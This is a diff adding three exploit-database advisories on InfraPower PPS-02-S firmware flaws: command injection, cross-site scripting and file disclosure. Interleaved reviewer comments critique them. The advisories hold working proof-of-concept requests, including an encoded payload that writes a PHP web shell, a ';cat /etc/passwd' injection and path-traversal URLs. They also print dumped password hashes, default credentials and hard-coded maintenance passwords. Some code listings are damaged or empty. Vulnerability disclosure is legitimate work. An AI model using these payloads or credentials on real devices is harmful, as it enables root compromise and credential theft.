+++ b/platforms/hardware/webapps/40640.txt
@@ -0,0 +1,348 @@
+InfraPower PPS-02-S Q213V1 Unauthenticated Remote Root Command Execution
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: InfraPower suffers from multiple unauthenticated remote command
+injection vulnerabilities. The vulnerability exist due to several POST
+parameters in several scripts not being sanitized when using the exec(),
+proc_open(), popen() and shell_exec() PHP function while updating the
+settings on the affected device. This allows the attacker to execute
+arbitrary system commands as the root user and bypass access controls in
+place.
+
+Tested on: Linux 2.6.28 (armv5tel)
+ lighttpd/1.4.30-devel-1321
+ PHP/5.3.9
+ SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5372
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5372.php
+
+
+27.09.2016
+
+--
+
+
+doupgrate.php:
+--------------
+
+
+09:
+10: echo "Firmware Upgrate Using NFS:
";
+11: echo "IP=".$_POST["ipaddr"]."
";
+12: echo "Firmware Name=".$_POST["fwname"]."
";
+13: system("sh nfs.sh");
+14: echo "Mounting NFS
";
+15: system("mount -t nfs -o nolock ".$_POST["ipaddr"].":".$_POST["nfsdir"]." /nfs");
+16: system("cp /nfs/".$_POST["fwname"]." /");
+17: echo "Flash erasing
";
+18: system("@flash_eraseall /dev/mtd0");
+19: system("cp /".$_POST["fwname"]." /dev/mtd0");
+20: echo "Upgrate done
";
+21: system("umount /nfs");
+22: echo "Reboot system
";
+23: system("reboot");
+24: ?>
+
+---------------------------------------------------------------------
+
+
+IPSettings.php:
+---------------
+
+
+83: $IP_setting = ereg_ip($_POST['IP']);
+84: $Netmask_setting = ereg_ip($_POST['Netmask']);
+85: $Gateway_setting = ereg_ip($_POST['Gateway']);
+...
+...
+110: $fout = fopen("/mnt/mtd/net_conf", "w");
+111: if($fout){
+112: $output = substr($output, 0, -1);
+113: fprintf($fout, "%s", $output);
+114: //echo $change_ip.'b';
+115: if($change_ip === '1'){
+116: $str = '';
+117: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
+118: // echo $str."\n";
+119: }
+120: if($change_gw === '1'){
+121: $str = '';
+122: exec('ip route del default', $str);
+123: exec('route add default gw '.$Gateway_setting, $str);
+124: // echo $str[0]."a\n";
+125: }
+126: }
+127: fclose($fout);
+...
+...
+164: function ereg_ip($ipstring){
+165: $ipstring=trim($ipstring); //移除前後空白
+166: //格式錯誤
+167: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
+168: //內容檢查
+169: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。
+170: foreach($ip_segment as $k =>$v){
+171: if($v >255){
+171: return 0;
+172: }
+173: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0,ex:1.020.003.004 =>1.20.3.4
+174: } //end foreach
+175: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理
+176: return $ipstring;
+177: }
+
+---------------------------------------------------------------------
+
+
+Login.php:
+----------
+
+
+126: $UserName = getConf("/mnt/mtd/web_conf", "UserName");
+127: $Password = getConf("/mnt/mtd/web_conf", "Password");
+128:
+129: //echo 'z'.$_POST['ID_User'].';'.$UserName.' Pwd:'.$_POST['ID_Password'].';'.$Password;
+130: if($_POST['ID_User'] === $UserName && $_POST['ID_Password'] === $Password){
+...
+...
+140: $_SESSION['Login'] = $_POST['ID_User'];
+141:
+142: //Login
+143: $loginTime = date("Y-m-d,H:i:s.0,P");
+144: $remoteIP = $_SERVER['REMOTE_ADDR'];
+145: //----------SNMP checking ---Ed 20130307------------------------<
+146: $SNMPEnable = getConf("/mnt/mtd/snmp_conf", "enable");
+147: if ($SNMPEnable == "1") {
+148: $TrapEnable = getConf("/mnt/mtd/snmp_conf", "trap");
+149: if ($TrapEnable == "v2Trap") {
+150: $trapTo = getConf("/mnt/mtd/snmp_conf", "IP");
+151: shell_exec('/usr/bin/snmptrap -M /usr/share/snmp/mibs/ -c public -v 2c ' . $trapTo . ' \'\' InfraPower-MIB::webLogin InfraPower-MIB::objectDateTime s "' . $loginTime . '" InfraPower-MIB::userName s "' . $_POST['ID_User'] . '" InfraPower-MIB::webAccessIpAddress s "' . $remoteIP . '"');
+152: //echo "alert($res);";
+153: }
+154: }
+
+---------------------------------------------------------------------
+
+
+Ntp.php:
+--------
+
+
+36:
+
+---------------------------------------------------------------------
+
+
+production_test1.php:
+---------------------
+
+
+4: if( isset($_POST['macAddress']) )
+5: {
+6: shell_exec("echo ". $_POST['macAddress'] . " > /mnt/mtd/mac_addr");
+7: $mac = shell_exec("cat /mnt/mtd/mac_addr");
+8: /*$result = $fail;
+9: echo $mac . ",";
+10: echo $_POST['macAddress'];
+11: if( !strcmp($mac,$_POST['macAddress']) )
+12: $result = $success;
+13: echo "verify - " . $mac . " - " . $result;*/
+14: echo "verify - " . $mac;
+15:
+16: exit();
+17: }
+
+---------------------------------------------------------------------
+
+
+SNMP.php:
+---------
+
+
+34: if($_POST["SNMPAgent"] === "Enable"){
+35: exec('kill -9 `ps | grep "snmpd -c /mnt/mtd/snmpd.conf" | cut -c 1-5`');
+36: setConf("/mnt/mtd/snmp_conf", "enable", "1");
+37:
+38: if(!empty($_POST["CommuintyString"]) && !empty($_POST["CommuintyWrite"]))
+39: {
+40: exec("cp /etc/snmpd.conf /mnt/mtd/snmpd.conf");
+41: exec("sed -i s/public/".$_POST["CommuintyString"]."/g /mnt/mtd/snmpd.conf");
+42: setConf("/mnt/mtd/snmp_conf", "pCommunity", $_POST["CommuintyString"]);
+43: setSnmpConf(1,$_POST["CommuintyString"]);
+44: setSnmpConf(2,$_POST["CommuintyWrite"]);
+45: $pCommunity = $_POST["CommuintyString"];
+46: }
+
+---------------------------------------------------------------------
+
+
+System.php:
+-----------
+
+
+86: if(!empty($_POST['ChangeTime']) == "1"){
+87: if(checkdate($_POST['month'], $_POST['day'], $_POST['year']) == 1){
+88:
+89: //Ray modify
+90: $datetime = date("mdHiY.s", mktime($_POST['hour']-1,$_POST['minute']-1,$_POST['second']-1,$_POST['month'],$_POST['day'],$_POST['year']));
+91: //$datetime = $_POST['month'].$_POST['day'].$_POST['hour'].$_POST['minute'].$_POST['year'].'.'.$_POST['second'];
+92:
+93:
+94: if(isset($_POST['TimeZone'])){
+95: setTimeZone($_POST['TimeZone']);
+96: $orgZone = $_POST['TimeZone'];
+97: }
+98:
+99: exec('date '.$datetime);
+100: exec('hwclock -w');
+101: exec('hwclock -w -f /dev/rtc1');
+...
+...
+180: if(isset($_POST['TimeServer'])){
+181: //$TimeServer = ereg_ip($_POST['TimeServer']);
+182: if(!empty($_POST['TimeServer'])){
+183: $TimeServer = $_POST['TimeServer'];
+184:
+185: $returnStr = exec("/usr/bin/ntpclient -s -h ".$TimeServer . " -i 1");
+...
+...
+286: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
+...
+...
+292: exec('route add default gw '.$Gateway_setting, $str);
+...
+...
+336: function ereg_ip($ipstring){
+337: $ipstring=trim($ipstring); //移除前後空白
+338: //格式錯誤
+339: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
+340: //內容檢查
+341: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。
+342: foreach($ip_segment as $k =>$v){
+343: if($v >255){
+344: return 0;
+345: }
+346: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0,ex:1.020.003.004 =>1.20.3.4
+347: } //end foreach
+348: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理
+349: return $ipstring;
+350: }
+
+---------------------------------------------------------------------
+
+
+UploadEXE.php:
+--------------
+
+
+72: if(isset($_POST['hasFile'])){
+73: if ($_FILES['ExeFile']['error'] > 0){
+74: echo 'Error: ' . $_FILES['FW']['error'];
+75: }else{
+76: echo 'File Name: ' . $_FILES['ExeFile']['name'].'
';
+...
+...
+80: move_uploaded_file($_FILES['ExeFile']['tmp_name'], '/ramdisk/'.$_FILES['ExeFile']['name']);
+81: chmod("/ramdisk/".$_FILES['ExeFile']['name'], "0777");
+82: $fp = popen("\"/ramdisk/".$_FILES['ExeFile']['name']."\"", "r");
+
+---------------------------------------------------------------------
+---------------------------------------------------------------------
+---------------------------------------------------------------------
+
+
+#1
+--
+
+PoC Request:
+
+curl -i -s -k -X 'POST' \
+ -H 'User-Agent: ZSL-Injectinator/3.1 (Unix)' -H 'Content-Type: application/x-www-form-urlencoded' \
+ --data-binary $'SNMPAgent=Enable&CommuintyString=public|%65%63%68%6f%20%22%3c%3f%70%68%70%20%65%63%68%6f%20%73%79%73%74%65%6d%28%5c%24%5f%47%45%54%5b%27%63%27%5d%29%3b%20%3f%3e%22%20%3Etest251.php%26&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254' \
+ 'https://192.168.0.17/SNMP.php?Menu=SMP'
+
+...
+
+curl -k https://192.168.0.17/test251.php?c=whoami;echo " at ";uname -a
+
+Response:
+
+root
+ at
+Linux A320D 2.6.28 #866 PREEMPT Tue Apr 22 16:07:03 HKT 2014 armv5tel unknown
+
+
+#2
+--
+
+PoC Request:
+
+POST /production_test1.php HTTP/1.1
+Host: 192.168.0.17
+User-Agent: ZSL-Injectinator/3.1 (Unix)
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+macAddress=ZE:RO:SC:IE:NC:E0;cat /etc/passwd
+
+
+Response:
+
+HTTP/1.1 200 OK
+X-Powered-By: PHP/5.3.9
+Content-type: text/html
+Connection: close
+Date: Fri, 17 Jan 2003 16:58:52 GMT
+Server: lighttpd/1.4.30-devel-1321
+Content-Length: 751
+
+verify - root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
+bin:x:1:1:bin:/bin:/bin/sh
+daemon:x:2:2:daemon:/usr/sbin:/bin/sh
+adm:x:3:4:adm:/adm:/bin/sh
+lp:x:4:7:lp:/var/spool/lpd:/bin/sh
+sync:x:5:0:sync:/bin:/bin/sync
+shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
+operator:x:11:0:Operator:/var:/bin/sh
+nobody:x:99:99:nobody:/home:/bin/sh
+admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
+user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
+service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
+www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
+www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
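Review bot: The write-up does not say which of the listed sinks are actually injectable, although the excerpts differ: doupgrate.php lines 15-19, production_test1.php line 6, SNMP.php line 41 and System.php line 185 concatenate raw `$_POST` values into a shell command. By contrast, the `exec()` calls at IPSettings.php lines 117 and 123 take values that first pass through `ereg_ip()`, which from the code shown returns either 0 or a string rebuilt from integer-cast octets, and Login.php line 151 appears to be reached only after the `===` credential check. Marking each excerpt as confirmed or merely listed would help defenders prioritise. Several listings were also damaged before commit: the Ntp.php excerpt (line 36) is empty and the `echo` strings in doupgrate.php and UploadEXE.php break onto lines without a `+` marker, so they should be restored from the original advisory. For remediation I would add the fixed version from the header plus the root-cause fix, allow-list validation and per-argument quoting before every `exec()`/`system()`/`shell_exec()`/`popen()` call, e.g. `exec("/usr/bin/ntpclient -s -h ".escapeshellarg($TimeServer)." -i 1");`. A detection hint would also help: review web-server logs for POSTs to these scripts and look for unexpected `.php` files in the web root.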
diff --git a/platforms/php/webapps/40641.txt b/platforms/php/webapps/40641.txt
new file mode 100755
index 000000000..ea56b173d
--- /dev/null
+++ b/platforms/php/webapps/40641.txt
@@ -0,0 +1,235 @@
+InfraPower PPS-02-S Q213V1 Multiple XSS Vulnerabilities
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: InfraPower suffers from multiple stored and reflected XSS vulnerabilities
+when input passed via several parameters to several scripts is not properly
+sanitized before being returned to the user. This can be exploited to execute
+arbitrary HTML and script code in a user's browser session in context of an affected
+site.
+
+Tested on: Linux 2.6.28 (armv5tel)
+ lighttpd/1.4.30-devel-1321
+ PHP/5.3.9
+ SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5369
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5369.php
+
+
+27.09.2016
+
+--
+
+
+#################################################################################
+
+GET /SensorDetails.php?Menu=SST&DeviceID=C100"> HTTP/1.1
+
+#################################################################################
+
+POST /FWUpgrade.php HTTP/1.1
+Host: 192.168.0.17
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary207OhXVwesC60pdh
+Connection: close
+
+------WebKitFormBoundary207OhXVwesC60pdh
+Content-Disposition: form-data; name="FW"; filename="somefile.php"
+Content-Type: text/php
+
+t00t
+------WebKitFormBoundary207OhXVwesC60pdh
+Content-Disposition: form-data; name="upfile"
+
+somefile.php
+------WebKitFormBoundary207OhXVwesC60pdh
+Content-Disposition: form-data; name="ID_Page"
+
+Firmware.php?Menu=FRM
+------WebKitFormBoundary207OhXVwesC60pdh--
+
+
+#################################################################################
+
+POST /SNMP.php?Menu=SMP HTTP/1.1
+Host: 192.168.0.17
+
+SNMPAgent=Enable&CommuintyString=public&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254';alert(3)//
+
+#################################################################################
+
+
+lqwrm@zslab:~#
+lqwrm@zslab:~# ./scanmyphp -v -r -d infrapower -o scan_output.txt
+-------------------------------------------------
+PHP Source Code Security Scanner v0.2
+(c) Zero Science Lab - http://www.zeroscience.mk
+Tue Sep 27 10:35:52 CEST 2016
+-------------------------------------------------
+
+Scanning recursively...Done.
+
+dball.php:
+
+Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
+Line 45: Cross-Site Scripting (XSS) in 'echo' via '$Table'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
+
+
+doupgrate.php:
+
+Line 11: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
+Line 12: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
+Line 15: Command Injection in 'system' via '$_POST'
+Line 16: Command Injection in 'system' via '$_POST'
+Line 19: Command Injection in 'system' via '$_POST'
+
+
+Firmware.php:
+
+Line 166: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
+
+
+Function.php:
+
+Line 257: Header Injection in 'header' via '$_SERVER'
+Line 267: Header Injection in 'header' via '$_SERVER'
+
+
+FWUpgrade.php:
+
+Line 39: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+Line 43: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+Line 44: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+
+
+index.php:
+
+Line 2: Header Injection in 'header' via '$_SERVER'
+
+
+IPSettings.php:
+
+Warning: ereg() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
+Warning: split() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
+Line 117: Command Injection in 'exec' via '$IP_setting'
+Line 117: Command Injection in 'exec' via '$Netmask_setting'
+Line 123: Command Injection in 'exec' via '$Gateway_setting'
+
+
+ListFile.php:
+
+Line 12: PHP File Inclusion in 'fgets' via '$fp'
+
+
+Login.php:
+
+Line 151: Command Injection in 'shell_exec' via '$_POST'
+
+
+Ntp.php:
+
+Line 46: Command Injection in 'exec' via '$idx'
+
+
+OutletDetails.php:
+
+Line 78: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+Line 241: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+Line 623: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+Line 674: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+Line 730: Cross-Site Scripting (XSS) in 'echo' via '$row'
+Line 732: Cross-Site Scripting (XSS) in 'echo' via '$row'
+Line 914: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+
+
+PDUStatus.php:
+
+Line 625: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
+
+
+production_test1.php:
+
+Line 6: Command Injection in 'shell_exec' via '$_POST'
+Line 45: Command Injection in 'proc_open' via '$_ENV'
+
+
+SensorDetails.php:
+
+Line 844: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+Line 896: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+Line 1233: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+
+
+SensorStatus.php:
+
+Line 695: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
+
+
+SNMP.php:
+
+Line 41: Command Injection in 'exec' via '$_POST'
+
+
+System.php:
+
+Line 54: Header Injection in 'header' via '$_SERVER'
+Line 64: Header Injection in 'header' via '$_SERVER'
+Line 99: Command Injection in 'exec' via '$datetime'
+Line 99: Command Injection in 'exec' via '$datetime'
+Line 99: Command Injection in 'exec' via '$datetime'
+Line 99: Command Injection in 'exec' via '$datetime'
+Line 99: Command Injection in 'exec' via '$datetime'
+Line 99: Command Injection in 'exec' via '$datetime'
+Line 185: Command Injection in 'exec' via '$TimeServer'
+Line 286: Command Injection in 'exec' via '$IP_setting'
+Line 286: Command Injection in 'exec' via '$Netmask_setting'
+Line 292: Command Injection in 'exec' via '$Gateway_setting'
+
+
+UploadEXE.php:
+
+Line 74: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+Line 76: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+Line 82: Command Injection in 'popen' via '$_FILES'
+Line 96: PHP File Inclusion in 'fgets' via '$fp'
+Line 96: PHP File Inclusion in 'fgets' via '$buffer'
+
+
+WriteRequest.php:
+
+Line 96: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
+Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
+Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
+
+
+-----------------------------------------------------
+Scan finished. Check results in scan_output.txt file.
+
+lqwrm@zslab:~#
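Review bot: The advisory gives no remediation, and the sample requests land in different output contexts, so one escaping rule will not cover them: the `DeviceID` value in the SensorDetails.php request breaks out of an HTML attribute, while the `IP` value in the SNMP.php request appears (from its shape) to close a quoted string inside script. I would add a fix line after the requests, e.g. `Fix: htmlspecialchars($v, ENT_QUOTES, 'UTF-8') at HTML/attribute sinks; json_encode($v, JSON_HEX_TAG|JSON_HEX_AMP|JSON_HEX_APOS|JSON_HEX_QUOT) where the value is written into JavaScript`. The FWUpgrade.php request does not say which field is echoed back; the scanner lines for FWUpgrade.php point at `$_FILES`, so naming the reflected field would make the case verifiable. The appended scanmyphp listing is raw static-analysis output that includes command- and header-injection findings outside this advisory's XSS scope and labels plain `fgets` reads as "PHP File Inclusion", so it should be introduced as unverified leads rather than confirmed findings.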
diff --git a/platforms/php/webapps/40642.txt b/platforms/php/webapps/40642.txt
new file mode 100755
index 000000000..ae55b5516
--- /dev/null
+++ b/platforms/php/webapps/40642.txt
@@ -0,0 +1,389 @@
+InfraPower PPS-02-S Q213V1 Local File Disclosure Vulnerability
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: InfraPower suffers from a file disclosure vulnerability when
+input passed thru the 'file' parameter to 'ListFile.php' script is
+not properly verified before being used to read files. This can
+be exploited to disclose contents of files from local resources.
+
+-------------------------------------------------------------------
+ListFile.php:
+-------------
+
+8: if(isset($_GET['file'])){
+9: $handle = $_GET['file'];
+10: $fp = fopen('/ramdisk/'.$handle, 'r');
+11: while(!feof($fp)){
+12: $tmp=fgets($fp,2000);
+13: $tmp = str_replace("\n","
",$tmp);
+14: echo $tmp;
+15: }
+16: fclose($fp);
+17: }
+
+-------------------------------------------------------------------
+
+
+Tested on: Linux 2.6.28 (armv5tel)
+ lighttpd/1.4.30-devel-1321
+ PHP/5.3.9
+ SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5370
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5370.php
+
+
+27.09.2016
+
+--
+
+
+http://192.168.0.17/ListFile.php?file=../../../../../../../etc/passwd
+
+root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
+bin:x:1:1:bin:/bin:/bin/sh
+daemon:x:2:2:daemon:/usr/sbin:/bin/sh
+adm:x:3:4:adm:/adm:/bin/sh
+lp:x:4:7:lp:/var/spool/lpd:/bin/sh
+sync:x:5:0:sync:/bin:/bin/sync
+shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
+operator:x:11:0:Operator:/var:/bin/sh
+nobody:x:99:99:nobody:/home:/bin/sh
+admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
+user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
+service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
+www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
+www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
+
+
+http://192.168.0.17/ListFile.php?file=../../../../../../../etc/web_conf
+
+LoginAuth 1
+UserName 00000000
+Password 00000000
+
+
+http://192.168.0.17/ListFile.php?file=../../../../../../../mnt/mtd/password_conf
+
+dmin 999999
+manager 666666
+user 111111
+
+
+http://192.168.0.17/ListFile.php?file=../../../../../../../sbin/maintenance_shell.sh
+
+#!/bin/sh
+echo -n "Please enter maintenance password:"
+read -s pass
+InfraType=`cat /mnt/mtd/main_conf | grep "InfraType" | cut -d " " -f 2`
+if [ "$InfraType" == "1" ]; then
+if [ "$pass" != "InfraSolution" ]; then
+echo "Invalid maintenance password!"
+exit 0
+fi
+else
+if [ "$InfraType" == "2" ]; then
+if [ "$pass" != "InfraGuard" ]; then
+echo "Invalid maintenance password!"
+exit 0
+fi
+else
+if [ "$InfraType" == "3" ]; then
+if [ "$pass" != "InfraPower" ]; then
+echo "Invalid maintenance password!"
+exit 0
+fi
+else
+if [ "$InfraType" == "4" ]; then
+if [ "$pass" != "InfraCool" ]; then
+echo "Invalid maintenance password!"
+exit 0
+fi
+else
+#---emergency recovery mode
+echo "DEBUG su mode started!"
+su
+fi
+fi
+fi
+fi
+
+# create menu
+echo ""
+echo "***********************************************"
+echo "* Maintenance Menu *"
+echo "***********************************************"
+echo "(1) View(vi) /mnt/mtd/main_conf "
+echo "(2) View /mnt/mtd/snmp_conf "
+echo "(3) View /mnt/mtd/net_conf "
+echo "(4) View /mnt/mtd/web_conf "
+echo "(5) Enable auto patching(boot.sh) on bootup "
+echo "(6) Disable auto patching(boot.sh) on bootup "
+echo "(7) Clear all patching (/mnt/mtd/patch/) "
+echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
+echo "(9) Process Monitoring "
+echo "(A) Patch SNMP "
+echo "(B) Restore Configuration "
+echo "(P) Restore INI, POL profiles "
+echo "(E) Execute command line "
+echo "(M) View meminfo "
+echo "(X) Terminal console mode "
+echo "(R) Reboot "
+echo "(?) This menu "
+echo "(Q) Exit "
+echo "***********************************************"
+while true; do
+echo -n "Input Maintenance menu item number(? for help):"
+read y
+case $y in
+"?")
+echo ""
+echo "***********************************************"
+echo "* Maintenance Menu *"
+echo "***********************************************"
+echo "(1) View(vi) /mnt/mtd/main_conf "
+echo "(2) View /mnt/mtd/snmp_conf "
+echo "(3) View /mnt/mtd/net_conf "
+echo "(4) View /mnt/mtd/web_conf "
+echo "(5) Enable auto patching(boot.sh) on bootup "
+echo "(6) Disable auto patching(boot.sh) on bootup "
+echo "(7) Clear all patching (/mnt/mtd/patch/) "
+echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
+echo "(9) Process Monitoring "
+echo "(A) Patch SNMP "
+echo "(B) Restore Configuration "
+echo "(P) Restore INI, POL profiles "
+echo "(E) Execute command line "
+echo "(M) View meminfo "
+echo "(X) Terminal console mode "
+echo "(R) Reboot "
+echo "(?) This menu "
+echo "(Q) Exit "
+echo "***********************************************"
+;;
+"1")
+echo "****/mnt/mtd/main_conf******************************"
+vi /mnt/mtd/main_conf
+echo "****************************************************"
+;;
+"2")
+echo "****/mnt/mtd/snmp_conf******************************"
+cat /mnt/mtd/snmp_conf
+echo "****************************************************"
+;;
+"3")
+echo "****/mnt/mtd/net_conf*******************************"
+cat /mnt/mtd/net_conf
+echo "****************************************************"
+;;
+"4")
+echo "****/mnt/mtd/web_conf*******************************"
+cat /mnt/mtd/web_conf
+echo "****************************************************"
+;;
+"5")
+echo "(5) Enable auto patching(boot.sh) on bootup "
+echo -n "Are you sure to continue? [y/n]:"
+read ans5
+if [ "$ans5" == "y" ]; then
+if [ -f "/mnt/mtd/patch/mnt/mtd/boot.sh" ]; then
+echo -n "Patching boot.sh ..."
+cp /mnt/mtd/patch/mnt/mtd/boot.sh /mnt/mtd/boot.sh
+chmod 777 /mnt/mtd/boot.sh
+if [ -f "/mnt/mtd/boot.sh" ]; then
+echo "...done"
+else
+echo "...fail"
+fi
+else
+echo "file not exist: /mnt/mtd/patch/boot.sh"
+fi
+fi
+;;
+"6")
+echo "(6) Disable auto patching(boot.sh) on bootup "
+echo -n "Are you sure to continue? [y/n]:"
+read ans6
+if [ "$ans6" == "y" ]; then
+if [ -f "/mnt/mtd/boot.sh" ]; then
+echo -n "Disabling boot.sh pacthing..."
+rm /mnt/mtd/boot.sh
+echo "...done"
+else
+echo "File not exist: /mnt/mtd/boot.sh"
+fi
+fi
+;;
+"7")
+echo "(7) Clear /mnt/mtd/patch/ "
+echo -n "Are you sure to continue? [y/n]:"
+read ans7
+if [ "$ans7" == "y" ]; then
+echo -n " Removing patch files (/mnt/mtd/patch/*)..."
+rm -r /mnt/mtd/patch/*
+if [ ! -f "/mnt/mtd/patch/" ]; then
+echo "...done"
+echo -n "Reboot to apply changes? [y/n]:"
+read ans7r
+if [ "$ans7r" == "y" ]; then
+echo "Rebooting..."
+reboot
+fi
+
+else
+echo "...fail"
+fi
+fi
+;;
+"8")
+echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
+echo -n "Are you sure to continue? [y/n]:"
+read ans8
+if [ "$ans8" == "y" ]; then
+if [ -f "/www/patch/patch_now.sh" ]; then
+chmod 777 /www/patch/patch_now.sh
+sh /www/patch/patch_now.sh
+else
+echo "file not exist: /www/patch/patch_now.sh"
+fi
+fi
+;;
+"9")
+echo "****Process List*******************************"
+ps
+echo "***********************************************"
+;;
+"A")
+echo "(A) Patch SNMP "
+echo -n "Are you sure to continue? [y/n]:"
+read ans8
+if [ "$ans8" == "y" ]; then
+if [ -f "/www/patch/snmplink.sh" ]; then
+sh /www/patch/snmplink.sh
+if [ -f "/www/snmplink.log" ]; then
+cat /www/snmplink.log
+fi
+echo "Patching SNMP and its modules...done"
+else
+echo "file not exist: /www/patch/snmplink.sh"
+fi
+fi
+;;
+"B")
